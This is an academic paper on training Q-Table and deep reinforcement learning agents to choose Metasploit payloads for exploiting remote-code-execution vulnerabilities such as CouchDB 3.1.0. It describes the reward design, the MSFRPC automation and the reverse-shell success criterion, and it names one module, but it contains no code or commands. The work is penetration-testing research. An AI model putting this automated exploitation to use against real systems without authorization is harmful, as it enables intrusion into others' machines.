1. Introduction
Everyday, Information Technologies (IT) and Operation Technologies (OT) evolve to provide more services to humans. On the other hand, new vulnerabilities and threats appear in our systems, making them susceptible to cyber attacks. The arms race between attackers and defenders will never stop. The great advancements in Artificial Intelligence (AI) and Machine Learning (ML) helped solve problems that surpass human capabilities like winning a game of GO [
1].
Cybersecurity risk assessment can be conducted by experts to assess the security posture of an organization. This process involves vulnerability and threat analysis, and it is part of a larger process, which is risk management. The evaluation of vulnerabilities in a system can be performed manually by experts or automatically using special tools and algorithms. ML techniques can be utilized to automate vulnerability assessment and evaluation, which reduces the cost and effort (time) required by security experts. The impact of exploiting vulnerabilities can be catastrophic, affecting the confidentiality, integrity, and availability of IT and OT systems. The impact can include financial loss, reputational damage, and even physical harm [
2].
By identifying vulnerabilities in an organization’s systems and networks, organizations can implement patches, upgrade software, or modify configuration settings to improve the security posture of their systems. On average, out of the total number of vulnerabilities reported by vulnerability scanners, only 82% were relevant results (identified correctly), regardless of the vulnerabilities that scanners failed to report (18% were false positives) [
3]. Penetration testing provides organizations with a comprehensive evaluation of their security posture by identifying potential weaknesses or vulnerabilities in their systems and networks. This allows organizations to prioritize their efforts to improve security and mitigate risk.
Reinforcement Learning (RL) algorithms provide a framework for the agent to learn from its own experiences, by trial and error, to determine the optimal policy to follow in a given situation. The approach taken by RL algorithms is inherently different from supervised and unsupervised learning, as it involves a sequential decision-making process, where the outcome of each action is dependent on the previous decisions made. Traditional model-based approaches may fail in complex and changing environments. This makes RL especially important, as it is capable of dealing with such environments. RL algorithms can continuously learn from new situations and enhance their decision accordingly. This makes RL irreplaceable for dealing with situations where the optimal solution is uncertain.
In this paper, our main objective is to utilize the power of AI in automating the process of vulnerability exploitation. This can be accomplished by creating an AI agent that performs penetration testing scenarios using a large number of payloads that are available in the Metasploit framework [
4]. By doing so, we aim to successfully identify the most efficient payloads that can be used to exploit certain vulnerabilities. The identified most efficient payloads can then be used to test vulnerabilities in other systems. Automating this process using the power of AI and ML can significantly improve the efficiency of the risk assessment process, which leads to improving risk management. Therefore, the novelty of this work is employing Deep Reinforcement Learning (DRL) in vulnerability exploitation analysis.
The RL agents are trained to conduct penetration testing by attempting to exploit vulnerabilities using their payloads from the Metasploit framework. The agent is encouraged to pursue successful exploitation through a reward system, where successfully establishing a session on the target machine through a given payload results in a high reward, and failure to do so results in a low reward. The ultimate goal is to determine the most effective payload for exploiting identified vulnerabilities and analyzing their exploitability.
The main contributions of this paper are as follows:
Implemented vulnerability scanning supported by RL vulnerability exploitation analysis (
Section 4).
Designed, trained, and implemented an RL agent to perform vulnerability exploitation analysis by leveraging DRL, which performed better than Q-Tables in terms of accuracy. DRL achieved a maximum accuracy of 96.6% for a single vulnerability exploitation.
Tested the DRL learned model on multiple vulnerability scenarios.
Compared the results of using Q-Table versus using DRL in vulnerability exploitation analysis.
The rest of the paper is organized as follows.
Section 2 lays out the necessary background needed to understand our proposed DRL agent.
Section 3 summarizes the latest research work in automated penetration testing and the combination of AI, ML, and security risk assessment.
Section 4 presents the detailed research methodology.
Section 5 summarizes and discusses the results.
Section 6 discusses concluding remarks and future research opportunities.
3. Related Work
The National Institute of Standards and Technology (NIST) assigns high vulnerability severity values to vulnerabilities that are exposed and exploitable [
10], which is important to perform accurate risk assessment and management. In 2016, Defense Advanced Research Projects Agency (DARPA) hosted the Cyber Grand Challenge (CGC) Final Event, the world’s first all-machine cyber hacking tournament [
11]. This event demonstrates the importance of combining vulnerability exploitation and AI techniques to perform penetration testing.
Most of the work that we investigated in the literature which combines machine learning, vulnerability assessment, and penetration testing focused on post-exploitation and attack-path optimization [
12,
13,
14]. Next, we discuss the most recent related work.
Chaudhary et al. [
13] investigated using ML to automate penetration testing, which helps discover vulnerabilities in computer systems. The authors created a training environment where an agent could explore testing a network environment and find sensitive data. By training the agent in various environments, they aimed to make this method adaptable and work in different situations. The authors also suggested that future work could involve training the agent for more advanced tasks, like performing a deep analysis of the system and exploiting additional vulnerabilities.
Maeda and Mimura [
15] proposed a new approach that combined deep RL with PowerShell Empire, a tool that attackers use after penetrating the system (post-exploitation). This created intelligent agents that can make decisions according to the compromised system’s state. To train these agents, the authors experimented with the following models: A2C, Q-learning, and SARSA. Interestingly, the A2C model was able to gain the highest reward overall. Finally, the authors tested the trained agents in a completely new network environment. The A2C model was particularly successful in gaining administrative control over a critical system component, which is the domain controller.
Instead of performing regular penetration testing, Hu et al. [
16] used deep RL to automate the operation. The authors’ system works in two stages. First, they use the Shodan search engine to find relevant server data and build a realistic network topology. Then, a tool called MulVAL generates a map of possible attack routes within this network. Traditional search methods are used to analyze this map and identify all potential attack paths. This information is then converted into a format suitable for deep RL algorithms. In the next stage, a specific deep RL method called DQN takes over. Its goal is to identify an attack path in the network by exploiting certain vulnerabilities. The authors tested their system with thousands of different network scenarios. The DQN method achieved high accuracy in finding the optimal attack path, reaching up to 86%. In the remaining cases, it still provided valid alternative solutions. In addition, the framework could potentially be used in defense training to automatically recreate attacks in a training environment.
Schwartz and Kurniawat [
17] explored using a type of AI called model-free RL to automate pentesting. Their approach involved creating a fast and efficient simulation environment to train and test autonomous pentesting agents.
Within this simulator, they tested Q-learning in two forms: a basic table-based version and one that utilizes artificial neural networks. The results were promising: both versions successfully identified the most effective attack paths across various network layouts and sizes, without needing a pre-built model of action behavior. However, these algorithms were only truly effective for smaller networks with a limited number of possible actions. The researchers acknowledged this limitation and called for further development of scalable RL algorithms that can handle larger, more complex networks in more realistic settings.
Ghanem and Chen [
18] presented a novel approach to penetration testing that leverages the power of RL. Their idea was to train an AI agent to actively seek out and exploit vulnerabilities in computer systems. To achieve this, they proposed modeling the penetration testing process as a Partially Observed Markov Decision Process (POMDP). This model captures the uncertainty involved in real-world hacking scenarios. The agent would then learn through trial and error, using an external solver to make the best decisions based on the information it gathers. The main benefit of this approach is the potential for automated and regular testing, freeing up human security specialists for other tasks. Additionally, the ability of the AI to learn and adapt could lead to more accurate and reliable penetration testing compared with traditional methods.
While promising, it’s important to note that their research focused on the planning stage of penetration testing, not the entire process. Further development is needed to create a truly comprehensive AI-powered penetration testing system.
Ghanem and Chen [
19] proposed an Intelligent Automated Penetration Testing System (IAPTS) to automate penetration testing for small- and medium-size networks using RL. The main objective of this work is to minimize human intervention in the penetration testing process. The system works by integrating with industrial penetration testing modules and learning from human expertise while performing their tasks. The system relies on RL to learn from human expertise, then uses this knowledge to penetrate similar future scenarios. This reduces human errors that result form tiredness, omission, and stress. However, this system requires human expert supervision in the early learning stages. In addition, this approach is not efficient for large networks. In [
20], the authors solved the scalability problem by dividing the network being tested hierarchically as a group of clusters and solving each cluster separately.
Zennaro and Erdődi [
21] used Capture The Flag (CTF) competitions to analyze the trade-off between model-free learning and a priori knowledge. The authors demonstrate that providing a priori knowledge to the model-free RL agent reduces the complexity of solving the CTF challenges, allowing the challenges to be solved in a reasonable amount of time.
Erdődi et al. [
22] proposed a formalization to simulating SQL injection attacks using Q-learning RL agents utilizing two RL algorithms: the standard tabular Q-learning and DQN. The authors model the attack process as a capture-the-flag challenge, formulating it as a Markov decision process and as a reinforcement learning problem. Their agents learn to exploit SQL injection vulnerabilities, not just for a specific scenario, but to develop generalizable policies applicable to performing SQL injection attacks against any system. The authors analyze the effectiveness and convergence speed of the learned policies against challenges with varying complexity and the learning agent’s complexity. The simulation results provide a proof-of-concept support for using RL agents to perform autonomous penetration testing and security assessment.
Tran et al. [
23] proposed an architecture called Cascaded Reinforcement Learning Agents (CRLA) to address the challenge of large action spaces encountered in autonomous penetration testing. The authors formulated their problem as a discrete-time RL task modeled by a Markov decision process (MDP). The proposed RL architecture leverages an algebraic action decomposition strategy, which involves hierarchically structuring RL agents, each tasked with learning within a smaller action subset while still receiving the same external reward signal. This model-free approach eliminates the need for domain knowledge in action decomposition, enabling CRLA to efficiently navigate large action spaces and find optimal attack policies faster and more stably than single DQN agents. The authors use simulated environments from CybORG in a variety of scenarios with different configurations of hosts and action spaces to test their architecture, where all showed that CRLA had superior performance compared with the baseline single-agent Dueling DQN (DDQN), which is the core RL algorithm the authors used in their work.
Yi and Liu [
24] proposed an algorithm called MDDQN, which integrates one of the attack graph tools, the multi-stage vulnerability analysis language (MulVAL) and DDQN algorithm for intelligent penetration testing path design, to address the limitations of previous methods.
The authors’ experimental results show that the MDDQN algorithm improves the convergence speed and attack path planning efficiency. However, the MDDQN algorithm cannot autonomously scan the constructs and access network information. This means that MDDQN relies on an external source to provide this information, which can limit its effectiveness in real-world scenarios.
Unlike previous research that investigated and analyzed post-exploitation stages of the “Cyber Kill Chain”, our approach uses RL to focus on the earlier, pre-exploitation stage. Particularly, we trained an AI agent to pick the right payload to exploit the system. Given an operating system (OS) and a vulnerability, the agent can choose the most effective payload from the Metasploit framework to establish a remote connection between the victim and the attacker. This process has the potential to make security assessments faster and more accurate. By automating payload selection, our method goes beyond simply identifying a vulnerability; it checks if it can actually be exploited. Overall, our research contributes to the field of vulnerability exploitation and security assessments by providing a unique solution to the vulnerability exploitation stage of the security assessment cycle.
4. Methodology
In this section, we combine the details of our experimental setup with a breakdown of the main methods we employed.
4.1. Experimental Setup
In this subsection, we discuss the experimental setup that we used to test two use cases: CouchDB and a Group of Vulnerabilities (GV).
Table 1 shows the specification of the machines that were used in the testing and training of the use cases presented in the following subsections.
4.1.1. Use Case 1, CouchDB
In our previous work [
25], RL and Q-Table were used to perform vulnerability exploitation. We specifically tested our approach on Apache CouchDB version 3.1.0 [
26], which is vulnerable to remote code execution attacks [
27]. This vulnerability is a major security concern because it could be widely exploited by attackers.
To train our RL agent, we used a virtual machine to emulate the attacker that has the Kali Linux OS and another virtual machine which emulates the victim that has the Windows 10 OS. This setup simulates a real-world attack scenario. We then used a different setup for the deployment phase, in which the victim machine has the Windows 11 OS. In this work and for this use case, we used the same setup to test the same vulnerability (i.e., CouchDB), but this time using DRL instead of Q-Table. This single vulnerability with 194 payloads that are designed to exploit it serves as a good use case to test the two RL techniques (Q-Table and DRL).
4.1.2. Use Case 2, Group of Vulnerabilities
In this use case, a Group of Vulnerabilities (GV) was used to test the RL agent. This GV is listed in
Table 2. What is common between those vulnerabilities is that they all allow remote code execution by the attacker. A total of 256 payloads were used to train the model. Those payloads were used to try and exploit each one of the vulnerabilities listed in
Table 2 in an effort to create an RL agent that can be generalized to a group of vulnerabilities. Q-Table and DRL were separately used to train the model and deploy it later. Having a GV is more challenging to the model, as the state now has more vulnerabilities and more actions to choose from. The actions are the payloads that are used for vulnerability exploitation.
In use case 2, we used a machine that has the Kali Linux OS to emulate the attacker and a machine that has the Ubuntu OS to emulate the victim’s machine for the training and deployment phases. This use case has multiple vulnerabilities (four, in this case) and 256 payloads that can be used with any of the vulnerabilities, which creates a complex environment for an RL agent. This creates a good testing use case for using Q-Table and DRL compared with the single vulnerability use case (
Section 4.1.1).
4.2. RL Training and Deployment: Q-Table
In this subsection, we discuss Q-Table’s training and deployment for use cases 1 and 2. The state ‘
S’ of the system refers to the combination of an OS and a certain vulnerability. The Metasploit payloads that are used to exploit the vulnerability and change its state to a compromised OS represent the actions that can be performed ‘
A’.
Table 3 summarizes the states, actions, and RL parameters that exist in the system.
Table 3.
RL States, actions, and parameters.
Table 3.
RL States, actions, and parameters.
States (S) | Actions (A) | RL Parameters |
---|
Vulnerable OS (e.g., Windows with CouchDB) referred to by “” in Figure 2 | Each payload from Metasploit represents an action that can be used to exploit the vulnerable OS | Alpha: The learning rate, Gamma: The discount factor,
Epsilon: The exploration rate, The decay rate |
Exploited OS, attack succeeded. Referred to by “” in Figure 2 | Use case 1 has 194 actions (i.e., payloads). Use case 2 has 256 actions. | |
In the following list, we explain how the RL parameters influence the training process:
Learning rate (): This controls how much weight the agent gives to new information versus past experiences. A higher value means the agent prioritizes new information, while a lower value emphasizes past experiences.
Discount factor (): This balances the value of immediate rewards (benefits right now) with future rewards (benefits later).
Exploration rate (): This represents how often the agent tries random actions instead of the one it thinks is best. A higher value means the agent explores more, and a lower value means it sticks with what it knows works.
Decay rate: The rate at which is decayed to favor the exploitation of known actions with a high reward over the exploration of random actions.
During the training phase of the Q-Table on the Apache CouchDB vulnerability, we ran seven trials, each running for 500 episodes of exploitation. After training, a vulnerable Apache CouchDB 3.1.0 machine was used to deploy the trained agent. The agent managed to exploit the vulnerable machine in 8.10 s.
Our approach involved training an AI agent using RL utilizing the Metasploit framework. Metasploit offers a vast collection of payloads for exploiting vulnerabilities in different OSs. The RL algorithm trains the agent to pick the most effective payload for the job. It accomplishes this by using Metasploit’s RPC API to automate tasks within the framework.
While not all payloads work for every situation, the RL approach helps the agent make smart choices and successfully exploit the vulnerability.
Figure 3 shows this process. The following points summarize the training process presented in
Figure 2 and
Figure 3, given the state of the system (OS and vulnerability):
The agent sends a request to get ta payload to exploit the vulnerability from MSFRPC.
The agent chooses a certain payload to use. Here is how the agent decides which payload to use: with probability , the agent selects a random payload to be executed (i.e., an action). On the other hand, with probability (1 −), the agent selects the best known payload. This is an -greedy approach.
The agent sends a payload from Metasploit to try and exploit the vulnerability (take action).
After using a payload, the agent observes the outcome (new system state) and receives a reward (success or failure signal). This process repeats for a set number of times. As the agent learns, it relies less on random choices (
decreases) and focuses on the most successful payloads.
Figure 2 demonstrates the complete training process using Q-Tables.
Our agent considers a successful exploit to be one that opens a reverse shell session. This might not be the goal for every payload in Metasploit, as some might aim for different types of access (like a VNC session). But, for our purposes, a reverse shell signifies success.
To train the agent, we designed a reward system. It gets a high reward (+100) for successfully exploiting a vulnerability with a reverse shell and a penalty (−10) if it fails. These values encourage the agent to prioritize successful exploits and avoid failures.
Since our system only cares about achieving a reverse shell or not, the rewards are kept simple (+100 or −10). This prevents any confusion during training.
The agent’s choices are limited to payloads in Metasploit that can specify a local machine and port. To make decisions, the agent relies on its Q-Table, which stores information from past experiences. When facing a new situation (OS and vulnerability), the agent checks its Q-Table to find the best payload for the job.
We tested the agent’s decision-making results by letting it recommend a payload. The chosen payload was successfully delivered to the target machine and opened a special remote connection (reverse shell session), proving the agent’s decision was a good one. This process is illustrated in
Figure 4, where the agent picks the payload with the highest reward value. In this case, the payload name can be seen in the first row of
Figure 4, which is apache_couchdb_erlang_rce, and is used by MSFRPC to exploit the vulnerability. The goal of this payload is to open a reverse shell by the attacker with the victim machine. The remaining lines in the figure demonstrate the verbosity of the command, which ends by indicating a shell that connects the attacker with the victim machine.
For the second use case (GV), the same methodology was used, but instead of targeting CouchDB, the vulnerabilities listed in
Table 2 were targeted. The state of the system now includes an uncompromised OS with a list of vulnerabilities that can be exploited using certain actions (Metasploit payloads), which may change the state of the system to a compromised OS. While the first use case has one vulnerability and 194 actions, the second use case has four vulnerabilities and 256 actions (i.e., payloads).
4.3. RL Training and Deployment: DRL
DRL offers a promising approach for automating penetration testing by enabling agents to learn optimal exploitation strategies within the Metasploit framework. This subsection explores the specifics of DRL training and deployment in this context, focusing on its advantages over Q-learning.
4.3.1. Training Specifics for Metasploit Integration
Here, the DRL agent leverages the Metasploit RPC (MSFRPC) API to interact with the environment. The agent is trained using the DQN algorithm in a simulated environment replicating target systems.
The reward function plays a crucial role during the training process. In this case, a successful reverse shell session established through a chosen payload for a specific OS and vulnerability combination signifies a positive reward, while unsuccessful attempts receive negative rewards. The MSFRPC API provides the agent with available payloads for a given scenario.
4.3.2. DRL Deployment in Metasploit Environment
Deploying a DRL agent trained in simulations within the Metasploit environment required the continuous monitoring of the agent’s behavior and logging of its actions, which are essential for evaluating its performance, identifying potential biases, and ensuring responsible use. In this work, we evaluated the performance using the following metrics: success rate and the moving average of the rewards. In addition, DRL has a great advantage over Q-Tables; the deployment (testing) phase is dynamic and achieves continuous learning, which increases the accuracy of the results.
4.3.3. Testing Considerations
After training the agents, the agents are ready for testing. Testing the DRL agent required developing a comprehensive set of test cases covering various scenarios, including different OSs, vulnerabilities, and available payloads, as shown in the next section. Such test cases allow us to evaluate the agent’s effectiveness, efficiency, and robustness in diverse situations.
4.3.4. Advantages over Q-Learning
While Q-learning is a popular RL technique, DRL offers several advantages in this specific application:
Scalability: Q-learning requires storing Q-values for all possible state-action pairs, making it impractical for large state and action spaces. DRL, using function approximation techniques like NNs, can efficiently handle complex environments with vast state and action spaces like the one encountered in penetration testing. In the case of GV, adding one extra vulnerability doubles the size of the Q-Table, whereas in DRL, the same DQN can handle this complexity without bloating its size, making it much more scalable.
Continuous Learning: DRL agents can continuously learn and improve their performance over time by interacting with the environment. Q-learning typically requires manual updates to the Q-Table (e.g., new states), making it less suitable for dynamic environments where vulnerabilities and available payloads might change. This justifies the improvement in the accuracy of the system when using DRL over Q-Table, given that the learning continues after the deployment phase in DRL.
Generalization: DRL agents can learn from past experiences and generalize their knowledge to unseen situations because of using NNs. This allows the agents to adapt to different vulnerabilities and OSs. Q-learning, on the other hand, struggles with generalization and requires retraining for each new scenario. In our future work, we plan to test vulnerabilities that were not used in the training phase. This is the ultimate goal of this line of research.
By leveraging the strengths of DRL, this approach paves the way for autonomous penetration testing tools that can learn, adapt, and efficiently navigate complex landscapes within the Metasploit framework.
The two use cases, CouchDB (
Section 4.1.1) and GV (
Section 4.1.2), were tested using DRL instead of Q-Table. The results are presented and discussed in the next section.
6. Conclusions and Future Work
In this paper, we utilized RL to perform vulnerability exploitation. We built two RL agents: the first one uses Q-Table and the second one uses DRL. The state of the RL agent is identified by the OS and vulnerability under investigation. The actions of the RL agent are identified by the Metasploit payloads that can be used to exploit the given vulnerabilities. An exploitation is considered successful if the payload was able to create a reverse shell with the attacker. Both RL agents (i.e., the one using Q-Table and the one using DRL) were trained and tested on two use cases. The first use case has one vulnerability, while the second use case has four vulnerabilities.
Our results demonstrate that using DRL outperformed Q-Table in the two use cases. In the first use case, DRL had a maximum success rate of 96.6%, while Q-Table had 88.4%. For the second use case, DRL had a maximum success rate of 73.6%, while Q-Table had 71.2%. The DRL agent’s higher success rate stems from its ability to continuously learn and adapt during deployment, unlike the static Q-Table approach.
This research introduces a new way to automate tasks during pentesting, making them faster and less expensive. Our method uses an AI agent trained with RL to take advantage of the Metasploit framework. By automating the exploitation process, our approach frees up security specialists to focus on other important tasks. This can significantly reduce the time and resources needed to identify and address vulnerabilities in computer systems.
For future work, we plan to build a general agent that can exploit new vulnerabilities on which it was not trained. To achieve this, we are considering adding more information to the agent’s decision-making process like the Common Weakness Enumeration (CWE). This information could be used to make better decisions and exploit new scenarios and vulnerabilities.